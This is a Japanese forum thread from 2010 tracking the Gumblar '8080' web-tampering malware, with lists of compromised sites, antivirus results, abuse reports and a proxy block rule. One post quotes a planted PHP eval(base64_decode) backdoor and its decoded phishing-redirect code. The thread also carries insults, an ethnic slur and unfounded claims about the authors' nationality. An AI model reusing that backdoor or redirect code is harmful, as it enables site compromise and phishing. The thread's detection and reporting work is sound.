【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】at SEC
【Gumblar/GENO】Web改竄ウイルス総合スレ5【8080】 - 暇つぶし2ch100:名無しさん@お腹いっぱい。
10/02/09 21:02:11
鯖にアクセスできないぞゴラァ
ウイルスマダー!?

101:名無しさん@お腹いっぱい。
10/02/09 21:02:52
鯖煮食った

102:名無しさん@お腹いっぱい。
10/02/09 21:53:33
鯖缶のスレを見つけてそこのレシピを見たら気になってこれから作ってみる

103:名無しさん@お腹いっぱい。
10/02/09 22:40:56 BE:11318898-2BP(1236)
>>83
ろりぽ
>>86
めるぽ
>>95
whois上流めるぽ
株式会社エヌ・ティ・ティ ピー・シー コミュニケーションズ (NTT PC Communications,Inc.)


改竄されてはいるので。。。

104:名無しさん@お腹いっぱい。
10/02/10 01:18:50
>>103 乙!

>>95のスクリプトを投げてみた
URLリンク(www.virustotal.com)
Result:1/41 (2.44%)
Sophos:Troj/JSRedir-AR

( ´・ω・`)・・・

105:名無しさん@お腹いっぱい。
10/02/10 01:50:21
www●cory●ne●jp/koujirireki/index●htm

2つ入り
www●homemate-trusty●com/lent/

古いの
www●e-robin●com/recruit/index●html


aguseで見ると.ruの国名がFRになっているんだけど
どういうことだろう?



106:名無しさん@お腹いっぱい。
10/02/10 01:51:38
二輪駆動ってことだ

107:名無しさん@お腹いっぱい。
10/02/10 01:52:17
そういうことだよ

108:名無しさん@お腹いっぱい。
10/02/10 01:56:41
DEになってるときもあったな

109:名無しさん@お腹いっぱい。
10/02/10 02:05:22
国別ドメインのカントリーコードとサーバがある国は関係ない。

slickdeals-net●alimama●com●imageshack-us●recentmexico●ru
→ 94.23.199.154 FR
→ 188.40.118.68 DE
→ 78.41.156.236 GB
→ 85.25.152.241 DE
→ 91.121.112.227 FR

110:名無しさん@お腹いっぱい。
10/02/10 04:34:42 BE:2515744-2BP(1236)
>>105
めるぽしました。
whoisからめるぽ。
めるぽしました。

しましましほ。

111:名無しさん@お腹いっぱい。
10/02/10 07:44:01
マスターペニス

112:名無しさん@お腹いっぱい。
10/02/10 10:02:13
>>104
相変わらずadobeの脆弱性をつくものなのですか?

113:名無しさん@お腹いっぱい。
10/02/10 10:11:37
>>112
javascriptがかわっただけでDLされるプログラムは変わってなかった
環境とかによってDLされるプログラムが変わるだろうけど

とりあえず俺の環境だと相変わらず感染もしなかった・・・
file.exeうまく動かないってこれw

114:名無しさん@お腹いっぱい。
10/02/10 10:13:33
>>105の2つ入りのやつの2つは<script>varじゃなくて<script>thisなんだね。
今回はいろんなパターンがあるな。

115:名無しさん@お腹いっぱい。
10/02/10 10:16:36
こまけえな

116:名無しさん@お腹いっぱい。
10/02/10 10:23:34
>>113
ありがとう

117:名無しさん@お腹いっぱい。
10/02/10 10:37:09
いつもの人の記事
「Gumblar.8080」の改ざんコード、規則性が崩れて複数に分裂
URLリンク(blogs.yahoo.co.jp)

>『/*GNU GPL*/』『/*LGPL*/』『/*Exception*/』という特徴的な目印(コメント文)、そして直近のものだと目印がないながらもコードにいちおう規則性があったんですが、今回からコードが複数に分裂してサイトごとにほとんどバラバラな感じ。


で、アクセス制御に関して他の人の記事。非常に面倒くさい仕様になっている模様…
インジェクション 8080のアクセス制御?
URLリンク(jvnrss.ise.chuo-u.ac.jp)

>同一IPアドレスで数日後にアクセスしないとコンテンツ(=検体)がダウンロードできない

118:名無しさん@お腹いっぱい。
10/02/10 10:39:46
>>117
その記事は確認済みだけど、確かにその挙動の時もあったけど
必ずしもそうじゃない時もあるんだよね

ほんとよくわからんw

119:名無しさん@お腹いっぱい。
10/02/10 10:46:48
こんだけスクリプト自体も変更してるんだから、アクセス制御なり他の挙動もコロコロ変わってるんだろうねぇ。本体以外は

ホント憎たらしい程に頭良いな、このマルウェアの作者w
たまに本気でデバック段階のコードじゃないのっていうスクリプトを流したりお茶目なことしてくれるけどさ

120:名無しさん@お腹いっぱい。
10/02/10 11:04:05
頭いいとは思うけど、才能の無駄遣いだよなぁ…

121:名無しさん@お腹いっぱい。
10/02/10 11:06:24
まだ金とか物理的な被害ってないのかな?

122:名無しさん@お腹いっぱい。
10/02/10 11:09:34
>>120
随分と大規模な才能の無駄遣いだよな

123:名無しさん@お腹いっぱい。
10/02/10 11:34:00
>>120
こういう人がセキュリティ会社に入ってソフト作ってほしいよな。
高給で雇わないかなぁ。

124:名無しさん@お腹いっぱい。
10/02/10 11:44:22
allabout●co●jp/gm/gc/7236/

チェッカーに引っかかったのだが

125:名無しさん@お腹いっぱい。
10/02/10 11:51:13
>>124
親子丼とか見せんじゃねー
一気に腹へっちまったじゃねーかww

126:名無しさん@お腹いっぱい。
10/02/10 12:01:23
ノートンがRapid Releaseで対応してきた

127:名無しさん@お腹いっぱい。
10/02/10 12:16:34
>>123
コードの難読化自体はそんなに難しいことではない
それでもこの作者はかなりやり手だけど

キラよりもLの方が立場は厳しい

128:名無しさん@お腹いっぱい。
10/02/10 12:19:12
こんなのやってるのは底辺だろ

129:名無しさん@お腹いっぱい。
10/02/10 12:43:58
それにしても急に感染広まったのって何故?
プログラムの中身の変化にあまり関係なくみたいだが。

130:名無しさん@お腹いっぱい。
10/02/10 12:51:59
感染原因になるプログラムの更新をしてない鯖管がそれだけ多いってことじゃね?
感染してftpパス抜かれても改ざんが目に見えない箇所だから
めるぽとかされなきゃ気づかないんだろう

131:名無しさん@お腹いっぱい。
10/02/10 13:06:18
>>130
詳細な動作検証をしないとパッチを当てられないポリシーのところが多い
汎用機時代の考えから抜けられないバカ情シスのせい

パッチをあてなきゃ

でも検証しなきゃ当てられない

検証しなきゃ

予算がない

パッチあてられないね

ウイルスにやられたウギャー

132:名無しさん@お腹いっぱい。
10/02/10 13:15:41
MSパッチでてるね

133:名無しさん@お腹いっぱい。
10/02/10 18:32:38
スクリプトも変化してるが、
最後のfile.exeなんかほぼ常時、
アンチウィルスソフトでは引っかからない状態なんだけど
まさか落として来て実行されるなんてことはないよな?

134:名無しさん@お腹いっぱい。
10/02/10 18:35:05
そのウイルス対策ソフトがダメなんじゃないの?

135:名無しさん@お腹いっぱい。
10/02/10 18:35:12
ほぅ‥‥‥
URLリンク(blog.f-secure.jp)

136:名無しさん@お腹いっぱい。
10/02/10 18:38:44
>>135
ありゃ
これは完全に日本人狙ってるね

137:名無しさん@お腹いっぱい。
10/02/10 18:46:20
年賀状PDFか

138:名無しさん@お腹いっぱい。
10/02/10 18:46:33
ネットワークの脅威の改善、これはネットワーカーの責務です。
ガンブラーはネットワークの脅威です。

さて、ネットワーク上からガンブラーを消し去って
ネットワークの脅威はなくなるのでしょうか。

ネットワークの脅威とは何なのでしょうか。
マシンを管理出来ない方、HPを管理出来ない方
彼等もまたネットワークの脅威なのかも知れません。

ガンブラー仕掛け人に問います。
貴方達のしている事、それは
ネットワーカーとして胸を張れる事なのかと。。。

139:名無しさん@お腹いっぱい。
10/02/10 18:50:27
ウイルスは作品だろ

140:名無しさん@お腹いっぱい。
10/02/10 18:51:10
>>134
どこのウィルスソフトでも変らんよ。
今拾って来たfile.exeに反応するのはSymantecとTrendMicroだけだし。
このfile.exeもまた明日になれば変わる。
また数社が検出するか、全く検出しないかで、
また次の日が来ればfile.exeは変わる。
その繰り返し。

141:名無しさん@お腹いっぱい。
10/02/10 18:52:08
穴ふさいどけそんだけ

142:名無しさん@お腹いっぱい。
10/02/10 19:16:29
avastも一気に3パターンくらい追加したらしい
JS:IllredirがIまで来てる(俺が確認したのはFまでだった)

URLリンク(www.virustotal.com)

143:名無しさん@お腹いっぱい。
10/02/10 19:33:03
ウィルス?
ウィルスソフト?

www

144:名無しさん@お腹いっぱい。
10/02/10 19:39:30
つか、もうアンチウイルスソフトベンダー各社は :8080/ を含むアドレスのアクセスの一時遮断と
警告メッセージを出すようなフィルタの標準装備を考えた方がいいんじゃね?

145:名無しさん@お腹いっぱい。
10/02/10 19:40:30
そんなのすぐに対処されるからほとんど意味ない

146:名無しさん@お腹いっぱい。
10/02/10 19:54:57
プロバイダだけどbiglobeは海外からのftp接続を遮断するってさ

147:名無しさん@お腹いっぱい。
10/02/10 20:03:41
しかしここまで面倒なことになるとはなぁ
迷惑だが、このウィルス作り出したヤツは凄いとも思うわ
穴ふさぎしていても、一抹の不安はあるわ

148:名無しさん@お腹いっぱい。
10/02/10 20:18:20
下手人は日本人ですか?

149:名無しさん@お腹いっぱい。
10/02/10 20:31:24
>>146
こりか。
URLリンク(homepage.biglobe.ne.jp)

150:名無しさん@お腹いっぱい。
10/02/10 20:36:08
>>146
BIGLOBEは海外からFTPで接続して改ざんされてると思ってるのかな…
その可能性もあるけど、海外からの接続遮断しても改ざんされてたら
第三者の仕業じゃないって証明にもなるな

151:名無しさん@お腹いっぱい。
10/02/10 20:37:51
時間稼ぎにはなるとは思うが
今度は国内のボットネット感染PCを使って広めたりしそうだな
だがmeshユーザーとしては有難い処置だ

152:名無しさん@お腹いっぱい。
10/02/10 20:41:16
>>150
そのへんはログ見て判断したんだろ
さすがに想像だけで行動するほどバカじゃないはず

153:名無しさん@お腹いっぱい。
10/02/10 20:51:04
効果のほどはやってみないとわからないとしても、ISPの側から対策に乗り出した姿勢は評価。
サイト主の自己管理に任せていてもらちがあかないのは確かなんだし。

154:名無しさん@お腹いっぱい。
10/02/10 20:52:00
>>150
ユーザー自身によるFTPアクセス制限の開放・遮断を行う機能も追加する予定らしいし
ユーザーがしっかり対処すれば、FTPパスを盗んだだけじゃまず改変できなくなるだろう

155:名無しさん@お腹いっぱい。
10/02/10 21:01:56
海外サイトでのGumblar感染はあまり聞かないね
ここまで晒されてるURLは日本のサイトがほとんどだし

156:名無しさん@お腹いっぱい。
10/02/10 21:07:30
アホなこと言うなよ日本だけのわけないだろ

157:名無しさん@お腹いっぱい。
10/02/10 21:11:41
>>155
海外のサイトだとほとんど反応ないよな。

158:名無しさん@お腹いっぱい。
10/02/10 21:16:09
またアホが

159:名無しさん@お腹いっぱい。
10/02/10 21:20:54
海外は確かに少ないね

ニュースになるだけで
ふ~ん そっか~ 見たいな感じ

160:名無しさん@お腹いっぱい。
10/02/10 21:23:37
海外のサイト見ないからだろ
一人で必死に嘘言うなよ

161:名無しさん@お腹いっぱい。
10/02/10 21:25:53
複数のFTPクライアントのなかにFFFTPが含まれてたり
様々なサイト名のなかに日本のサイトが含まれてるだけで
日本を攻撃してるなんて言ってるアホもいるからな
そう言うのを信じるやつもいるから
いい加減な嘘はやめれ

162:名無しさん@お腹いっぱい。
10/02/10 21:28:37
>>135は開いても大丈夫なの?

163:名無しさん@お腹いっぱい。
10/02/10 21:37:38
>>160
ん?お前なに必死になってんの?
海外サイト見てるんだぜ
すごいぜとでもいいたいの?
ばかじゃねーの?ww

164:名無しさん@お腹いっぱい。
10/02/10 21:40:51
ロシアの地震予知サイトが2度攻撃受けてるがな

165:名無しさん@お腹いっぱい。
10/02/10 21:41:30
ほんとなら 【 感 染 し て い る ! 】 海 外 サ イ ト  の U R L 
張って欲しいな

166:名無しさん@お腹いっぱい。
10/02/10 21:42:28
URLリンク(gumblar.s1.dynamitelife.net)
新型用のGumblar Checker 3を公開しました。
そのうち旧型にも対応します。

167:名無しさん@お腹いっぱい。
10/02/10 21:53:31
>>165
自分で探せよ
当たり前だがあるから

168:名無しさん@お腹いっぱい。
10/02/10 21:54:23
このスレもずいぶん馬鹿が増えて来たな

169:名無しさん@お腹いっぱい。
10/02/10 22:00:19
>>162
えっ

170:名無しさん@お腹いっぱい。
10/02/10 22:10:16
>>166


171:名無しさん@お腹いっぱい。
10/02/10 22:11:08
馬鹿が多いスレですね

172:名無しさん@お腹いっぱい。
10/02/10 22:12:18
>>167
自分で探せ?
探さなくちゃ出てこないの?
馬鹿が多いね

173:名無しさん@お腹いっぱい。
10/02/10 22:18:16
馬鹿でもなんでもいいから、海外のサイトのURL貼って欲しい
もちろんドットを●に置き換えて

174:名無しさん@お腹いっぱい。
10/02/10 22:18:54
つ//www●vrsgroup●com/index.html
/*CODE1*/

175:名無しさん@お腹いっぱい。
10/02/10 22:25:02
新型(海外)
//www●elmwoodguestcottage●com/

176:名無しさん@お腹いっぱい。
10/02/10 22:27:44
ゲーム系サイトは大丈夫・・・かな

177:名無しさん@お腹いっぱい。
10/02/10 22:32:51
//ggpurasu●com/PS2/
ここならやられてた

178:名無しさん@お腹いっぱい。
10/02/10 22:41:49
いちいち挑発にのるなよ
バカを相手にしても疲れるだけだよ

179:名無しさん@お腹いっぱい。
10/02/10 22:46:27
珍しく荒れてる理由は↓これに尽きるなw

541 :名無しさん@お腹いっぱい。 :2010/02/10(水) 20:16:53
そろそろあほ大学の入試が終わる時期だな

180:名無しさん@お腹いっぱい。
10/02/10 22:49:44
こんだけなの?
すくねwwwwwwwww
腹痛くてげっぷでそうwwwwwwwwwwwwwwwww

181:名無しさん@お腹いっぱい。
10/02/10 22:50:42
>>178
馬鹿?
お前ウイルス相手に疲れないの?ww

182:名無しさん@お腹いっぱい。
10/02/10 22:52:24
>>180
これだけじゃないよ
米Yahoo使うとかなり出るから検索しろ

183:名無しさん@お腹いっぱい。
10/02/10 22:54:28
>>182
わかったわかった。
じゃあな



184:名無しさん@お腹いっぱい。
10/02/10 23:05:10
悪意をもってP2Pのスレにリンク貼ってる奴がいるのは、確か。

185:名無しさん@お腹いっぱい。
10/02/10 23:14:57
だんだん検索で
新型のスクリプト探すの難しくなって来たな。


186:名無しさん@お腹いっぱい。
10/02/10 23:22:25
>>177
よく見たら新型orz
URLリンク(www.virustotal.com)
0/40

187:名無しさん@お腹いっぱい。
10/02/11 00:03:42
ここも新型
www●mfreep●com

188:名無しさん@お腹いっぱい。
10/02/11 00:05:10
>>186
んーなもん、最後のfile.exe落とすまでほとんど検出されんぞ。
穴ふさいで、ゼロデイ来ないの祈る他無い。

神頼みだぞ。


189:名無しさん@お腹いっぱい。
10/02/11 00:11:46
>>188
落として検出されることを願おう

>>187
新型ではあるが昨日にはもう出てた
各社対応が進み始めてる(avastに怒られたよ)

190:名無しさん@お腹いっぱい。
10/02/11 00:18:55
今まではjpドメインばっかり見ていたんで
ほかをちょっと見てみた。

us、uk、de、ruはありそうだけど、cnが見つからない...




191:名無しさん@お腹いっぱい。
10/02/11 01:09:21
相変わらず早い・・・
・サイト改ざん~「8080」「Gumblar.x」に変化、サイト管理者の方は注意を
URLリンク(www.so-net.ne.jp)

「iframes are EVIL! Hate Zeus!」
陥落サイトの奪い合い再発の予感がw

192:名無しさん@お腹いっぱい。
10/02/11 02:14:52 BE:5030584-2BP(1236)
>>177
またろりぽ。

>>187
めるぽ。念のためでじろにもつーほー。

193:名無しさん@お腹いっぱい。
10/02/11 02:36:07
マスターペニス

194:名無しさん@お腹いっぱい。
10/02/11 02:52:49
やべーやられた

まず始めに環境
XPSP3 Firefox3.6 NoscriptでJavascript常時無効
Flashplayer10,0,42,34
AdobeReader未インストール(PDFX-change viewer 2.0 build0.45)
Java Runtime Environment6.0 build18
QuickTime未インストール、RealPlayer未インストール
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに疑わしきプログラムは無し

自サイトをftpで更新しようと思ったらdbフォルダに(ランダムな英数字文字列).phpが生成されてた。

<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4apY2FsbF9PT0nYmdZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2CRfUE9TVFsnZSddKSk7')); ?>

中身を見るとこんな感じのbase64で記述されていた。(↑の中身は例)
これを変換すると以下の内容が書かれたファイルが生成された。(xはランダムな数字。ここでは伏せる)

$axxxxxxxx=xxxxxx; if($_SERVER["HTTP_USER_AGENT"] != "asdfhgysrtgh") header("Location: URLリンク(heartearly.com)"); else print "rysdty"."jstyah"; $bxxxxxxxx=xxxxxx;

以下にも怪しいheartearly.comを調べるとフィッシングサイトだった
URLリンク(www.siteadvisor.com)

FTPに生成されていたのはこの(ランダムな英数字文字列).phpだけで、
サイト本体のindex.phpにこのファイルを呼び出すタグは幸い埋め込まれていなかったので自分や第三者に影響はなかった。

自分が感染した形跡もないし原因はいったい何だったのか全くわからん

195:名無しさん@お腹いっぱい。
10/02/11 03:59:51
原因は慢心だな。
これなら大丈夫という思い込みが
手動で調べるという作業を怠らせた。
その結果がこれだ。

196:名無しさん@お腹いっぱい。
10/02/11 04:53:27
>>194
同じかどうかわからないけど
去年の11月にあったGumblar.xのときは
その騒動が始まる前からWordPressとかでそういう改ざん騒ぎがあったはず。
サイトに使われているソフトが古くてその脆弱性を突かれたとか。
takahashifumiki■com/web/programing/717/

他のサイトにそのPHPファイルのURLが埋め込まれてウィルスばらまくのに使われてたんだろう。
トップにウィルス埋め込んでないと発覚が遅くなるということなのかも。

197:名無しさん@お腹いっぱい。
10/02/11 05:03:41
AdobeがFlash Playerの脆弱性を放置、責任者が「過ち」を認める
URLリンク(www.itmedia.co.jp)

Flash Playerにクラッシュの脆弱性情報があるとの情報は2008年9月に寄せられたが、
修正は次のリリースに先送りされた。

198:名無しさん@お腹いっぱい。
10/02/11 05:09:18
マスターペニス

199:名無しさん@お腹いっぱい。
10/02/11 07:01:28
>>197
このクソ会社潰れてくれねーかな?マジでいらねーだろ。

200:名無しさん@お腹いっぱい。
10/02/11 07:28:59
>Flash Player 10.1の安定版は「近いうちに」リリースする予定。
いつになるんだろ・・・・・・・

201:名無しさん@お腹いっぱい。
10/02/11 07:52:56
Flash Player 窓から投げ捨てたい

202:名無しさん@お腹いっぱい。
10/02/11 07:59:52
しかしこいつだけまともな代替案が無い罠

203:名無しさん@お腹いっぱい。
10/02/11 08:21:11
だからHTML5を早急に!
っていつまともな状態になるのかも分からんし、Flash一掃する程のモノかと言うと…
PDFも企業・お役所で根強いしなぁ

結局はAdobeに振り回される日々はまだまだ続く

204:名無しさん@お腹いっぱい。
10/02/11 08:59:08
火狐ざまあ

205:名無しさん@お腹いっぱい。
10/02/11 10:02:16
GENOもガンブラーも作ってるのは日本人だよ
これだけははっきりと言える

206:名無しさん@お腹いっぱい。
10/02/11 11:00:11
>>205
理由は?

207:名無しさん@お腹いっぱい。
10/02/11 11:03:30
作った本人なんだろ
通報しとくわ

208:名無しさん@お腹いっぱい。
10/02/11 11:16:11
普通に考えて日本人だろ
日本人じゃなきゃ利用しないようなサイトが感染されているケースが多過ぎる

209:名無しさん@お腹いっぱい。
10/02/11 11:17:23
>>208
それは違うだろw


210:名無しさん@お腹いっぱい。
10/02/11 11:25:35
ただこのスレに晒されているURLが日本ばっかりだから勘違いしたんでしょ?

211:名無しさん@お腹いっぱい。
10/02/11 11:32:21
ばーかb-か

212:名無しさん@お腹いっぱい。
10/02/11 11:43:40
>>205>>208は本当に馬鹿だな

213:名無しさん@お腹いっぱい。
10/02/11 12:26:06
>>202
Silverlightでも、HTML5でも。

214:名無しさん@お腹いっぱい。
10/02/11 12:34:18
>>205
>>208
>>205
>>208
>>205
>>208
>>205
>>208
>>205
>>208

215:名無しさん@お腹いっぱい。
10/02/11 12:38:23
>>205
>>208
>>205
>>208
>>205
>>208
>>205
>>208
>>205
>>208

216:名無しさん@お腹いっぱい。
10/02/11 12:58:48
>>196
つまりそれって、>>194が感染してるんじゃなくて、サーバが直接やられたってこと?

私も194と同じ環境なので、ヒトゴトじゃないです。
念のため全部確認しに行くか。大手鯖しか使ってないから大丈夫と信じたいけど。

217:名無しさん@お腹いっぱい。
10/02/11 13:03:01
犯人は日本人、あるいは外国人の男性、もしくは女性

218:名無しさん@お腹いっぱい。
10/02/11 13:05:06
犯人はヤス

219:名無しさん@お腹いっぱい。
10/02/11 13:06:58
>>146
これ自分で書いといてあれだが、遮断するのは2/22からだったんだな
緊急措置ならさっさとやってくれよw

220:名無しさん@お腹いっぱい。
10/02/11 13:42:20
GENOウィルスチェッカーって今あてになるの?

221:名無しさん@お腹いっぱい。
10/02/11 13:54:09
>>220
笑わすなw
わけ分からずに言われるがまま使うならモノが何でも意味ねえだろ

222:名無しさん@お腹いっぱい。
10/02/11 14:05:31
で、あてになるの?

223:名無しさん@お腹いっぱい。
10/02/11 14:12:46
ググれカス

224:名無しさん@お腹いっぱい。
10/02/11 14:23:36
前言ったロシアの地震予知サイトなんだがスレにいる人柱によるとまた感染してるらしい。Dr.Webとgredでは安全との事なんだが・・・
quake_vnb●rshu●ru/index_eng●html
ここでは報告されたか分からんが元祖GENOも含め計3回目の感染らすぃ・・・

225:名無しさん@お腹いっぱい。
10/02/11 14:29:24
>>224
Gumblar Checker 3で検出されないことを確認したので、現在パターンを試行錯誤中です。
対応までしばらくお待ちください。

226:名無しさん@お腹いっぱい。
10/02/11 14:46:03
>>221
だってどうみても感染してないサイトが100%とかなってるんだけど

227:名無しさん@お腹いっぱい。
10/02/11 15:29:59
>>225
ってかgithubにUPして

228:名無しさん@お腹いっぱい。
10/02/11 15:35:59
>>220
GENOウイルスチェッカーってまさか去年のやつ…?
あれはもう古いぞ

229:名無しさん@お腹いっぱい。
10/02/11 15:49:15
遅れましたが>>224のスクリプトに対応しました。
URLリンク(gumblar.s1.dynamitelife.net)

>>227
考えておきます。

230:227
10/02/11 16:02:18
>>229
ありがとう
よろしく

231:名無しさん@お腹いっぱい。
10/02/11 16:04:14
>>228
マジで
バカなこときいてごめん…

232:名無しさん@お腹いっぱい。
10/02/11 16:37:03
去年のチェッカーなんかリリース直後に信用ならん判定出てたのにw

233:名無しさん@お腹いっぱい。
10/02/11 16:41:22
糞チェッカは糞

234:名無しさん@お腹いっぱい。
10/02/11 16:48:56
質問なんだけど、>>233の糞チェッカっていうのは、
GENOウイルスチェッカー(URLリンク(geno.2ch.tc))を指してるの?

235:名無しさん@お腹いっぱい。
10/02/11 16:59:14
readerのバージョン古いまま放置とかほんとに糞説明の糞サイトだな

236:名無しさん@お腹いっぱい。
10/02/11 17:19:19
>>235
お前がやれよw

237:名無しさん@お腹いっぱい。
10/02/11 17:34:52
//www●jtmetal●jp/data/index2●html
/*CODE1*/

238:名無しさん@お腹いっぱい。
10/02/11 18:09:32
>>216
Gumblarとの関連は不明だけどCMSに脆弱性があって狙われていたのは事実
BASE64でやられてたとこも同じ

自分は大丈夫と思わず常に注意は必要
大手だから大丈夫とか根拠のない思い込みはやめたほうがいい
信じる信じないの問題じゃないです

239:名無しさん@お腹いっぱい。
10/02/11 18:22:24
以上だ、何か質問ある?

240:名無しさん@お腹いっぱい。
10/02/11 18:23:24
大手だからといって大丈夫と思ってる奴まだ居たのか。


241:名無しさん@お腹いっぱい。
10/02/11 18:32:21
大手は大丈夫
任天堂もトヨタも平気だし


242:名無しさん@お腹いっぱい。
10/02/11 18:33:57
超大手じゃん

243:名無しさん@お腹いっぱい。
10/02/11 18:38:45
Gumblar Checker ver2/ver3の管理者様
ver2はIE8でチェックすると途切れ続けます。
最初の製作者様の時もそうで、その後対応されてからは症状が出ませんでした。
ver3はチェックすると文字化けするんですが自分だけでしょうか。

244:名無しさん@お腹いっぱい。
10/02/11 19:02:23
>>208
URLリンク(www.just-kaspersky.jp)

> 2009年10月14日にこのマルウェアを検知してから、11月13日現在までカスペルスキーでは既に
> 国内1,250件以上(世界70,000件以上)の感染サイトを確認しており、大手ISPや管理機関と共に、
> 連携を始めています。

245:名無しさん@お腹いっぱい。
10/02/11 19:18:31
>>243
とりあえずIETester入れて試してみましたが、どちらの現象も再現出来ませんでした。
ver3の方はとりあえず対策っぽいのをしてみましたが、いかがでしょうか。

246:名無しさん@お腹いっぱい。
10/02/11 19:27:34
>245
対応ありがとうございます。ver3は文字化けしなくなりました。
ver2の途切れ状態ですが、チェック後は大丈夫ですが下にスクロールすると途切れ出します。
ちなみに、製作者様からの当時の回答です。↓
>ハイライト表示に使っているSyntaxHighlighterの一部機能がIE8と相性が悪いようで、この機能を無効にすることで修正しました

247:名無しさん@お腹いっぱい。
10/02/11 19:48:44
>>246
SyntaxHighlighterをUAにTrident/4.0が入っていると無効にするようにしてみましたがいかがでしょうか。

248:名無しさん@お腹いっぱい。
10/02/11 19:50:46
>247
途切れなくなりました!
勝手なお願いに、すばやく対応してくださりありがとうございました。
いつもお世話になっております。

249:名無しさん@お腹いっぱい。
10/02/11 20:30:05 BE:5660249-2BP(1236)
>>237
めるぽしました。
スレリンク(sec板:94番)
まだ残ってたのか…

250:名無しさん@お腹いっぱい。
10/02/11 21:48:56
www●lets-juken●com
は放置みたいだな

251:名無しさん@お腹いっぱい。
10/02/11 21:52:42
//dreamcafe●s17●xrea.com/

二重感染

252:名無しさん@お腹いっぱい。
10/02/11 21:55:11
//tantei-shoukai●com/

253:名無しさん@お腹いっぱい。
10/02/11 22:01:15
//cherry●piyo●to/st/s/o/index.html

254:名無しさん@お腹いっぱい。
10/02/11 22:44:34
>>250
aguse Gateway(Kaspersky?)でスルー(T_T) ESETでブロック

255:名無しさん@お腹いっぱい。
10/02/11 22:57:47
感染覚悟でURL報告大変ですなあ
>>3をしっかり行っているとは思いますが


256:名無しさん@お腹いっぱい。
10/02/11 22:59:20
>>255
なんか何にもわかってない気がする

257:名無しさん@お腹いっぱい。
10/02/11 23:16:09
>>255みたいな子は真似しないでね!

258:名無しさん@お腹いっぱい。
10/02/11 23:25:58
>>255
まあとりあえず赤くしておこうか

259:名無しさん@お腹いっぱい。
10/02/11 23:33:16
>>255 これだから初心者は・・・

Adobe Reader以外のPDFソフトで感染報告は無いの?

260:名無しさん@お腹いっぱい。
10/02/11 23:47:25
これだからチャンコロ連中は・・・
そんなに照れるなよ

261:名無しさん@お腹いっぱい。
10/02/11 23:53:26
もう黙ってたほうがいいよ

262:名無しさん@お腹いっぱい。
10/02/11 23:58:07
死ねカス

263:名無しさん@お腹いっぱい。
10/02/12 00:03:13
無知を指摘されて切れちゃうとか
お里が知れるね

264:名無しさん@お腹いっぱい。
10/02/12 00:03:59
カスにカスって言われてもw

265:名無しさん@お腹いっぱい。
10/02/12 00:13:29
情弱黙れww

266:名無しさん@お腹いっぱい。
10/02/12 00:16:16
=========ここまで俺一人の自作自演=========

267:名無しさん@お腹いっぱい。
10/02/12 00:17:47
楽しゅうございました

268:名無しさん@お腹いっぱい。
10/02/12 00:50:46
>>250
index.htmlは修正したけど/javascript/swapimage.js が絶賛放置中
Last-Modified: Fri, 22 Jan 2010 01:53:43 GMT /*Exception*/
パスワード変える知恵はあったか

269:名無しさん@お腹いっぱい。
10/02/12 01:45:51 BE:1887034-2BP(1236)
>>250
8日(月曜日)に さくらインターネットAbuse対策チーム へ再めるぽしてます。。。。
届いてにゃいのか。。。

>>251-252
でじろ

>>253
cherry●piyo●to陥落、サンプルページも感染中。
whoisから210.233.74.155の鯖缶へめるぽ。


aguse落ちてる?

270:名無しさん@お腹いっぱい。
10/02/12 02:09:35
>>269
つーほー乙です。

271:名無しさん@お腹いっぱい。
10/02/12 02:23:30
見返りを求めてんだろうよ

272:名無しさん@お腹いっぱい。
10/02/12 04:19:57
250って1月にもつーほーしたんだよな。

273:名無しさん@お腹いっぱい。
10/02/12 04:26:44
>>250はVBでブロック。

274:名無しさん@お腹いっぱい。
10/02/12 04:47:40 BE:2516328-2BP(1236)
>>272 スレリンク(sec板:280番)+299
>>269の8日(月曜日)に送った内容(一部省略してます)は以下でCCでJPCERT/CCにも送付してその自動応答あり。
----------------------------------------------------------------------------------------------------
お疲れ様です。
今現在、 www●lets-juken●com/javascript/swapimage.js にはまだガンブラーのスクリプトがあります。


(2010/01/22 14:57), SAKURA Internet support wrote:
>
>  さくらインターネットAbuse対策チームの○○と申します。
> -----
>> www●lets-juken●com/index.html
>> www●lets-juken●com/javascript/swapimage.js
>>
>>
>> 悪意のあるスクリプトがあります。
>> スクリプトは常に更新されている模様です。
>>
>> ガンブラー8080です。
>> 迅速な対応を切に願います。
>> これまでに訪れた人にも注意喚起を行ってください。
>>
>> 該当サイトに連絡できるメールアドレスが見当たらなかったので
>> Whois情報からお知らせしますことをご容赦ください。
>>
>> また同時にJPCERT/CCにもお知らせします。
>
> -----
>  当該コンテンツ管理者へは早急に対応要請を行わせていただ
> きました。
>
>  この度は、情報提供をいただきまして有難うございます。

275:名無しさん@お腹いっぱい。
10/02/12 04:49:06 BE:7703377-2BP(1236)
まぁ、感染サイトがいぱーいあるので対応も後手後手になってるのかも。。。

276:名無しさん@お腹いっぱい。
10/02/12 04:55:33
なおすきなさそうだからどこかで「危険サイト」としてさらせないものかな。


277:名無しさん@お腹いっぱい。
10/02/12 05:12:01
2010/02/12 5:08:42 http://www.lets-juken.com/javascript/swapimage.js Opera Internet Browser Denied: HEUR:Trojan-Downloader.Script.Generic
Exception型なのに変なの

278:名無しさん@お腹いっぱい。
10/02/12 09:19:23
www●7chord●com/mobile/

try-function型改良版?

279:名無しさん@お腹いっぱい。
10/02/12 09:42:04
squid.conf での対策の一例:

acl gumblarhost dstdomain thechocolateweb.ru を参考にして

acl gumblaruri url_regex ^URLリンク(.*\.ru:8080)
を追加して deny するとよし!なのかなのか?

280:名無しさん@お腹いっぱい。
10/02/12 10:20:42
Adobe Flash Player 10.0.45.2
URLリンク(get.adobe.com)

281:名無しさん@お腹いっぱい。
10/02/12 10:46:37
俺の端末に落ちてくるfile.exeは相変わらずまともに動いてくれないんだが・・・
みんなよく感染できるなw

282:名無しさん@お腹いっぱい。
10/02/12 10:47:49
Security update available for Adobe Flash Player
URLリンク(www.adobe.com)

283:へたれ発掘屋
10/02/12 11:10:14
ver~(2発混在)
URLリンク(slim)<)●rubbersoul●ne●jp/store/home●htm

ver~、this~(2発混在)
URLリンク(www)●ojika-ns●jp/21gihu

最新型が釣れにくいorz

284:194
10/02/12 11:21:59
>>216
>サーバが直接やられたってこと?
その通り。。
ガンブラーが登場する3年以上前から24時間全プロセスの監視してて
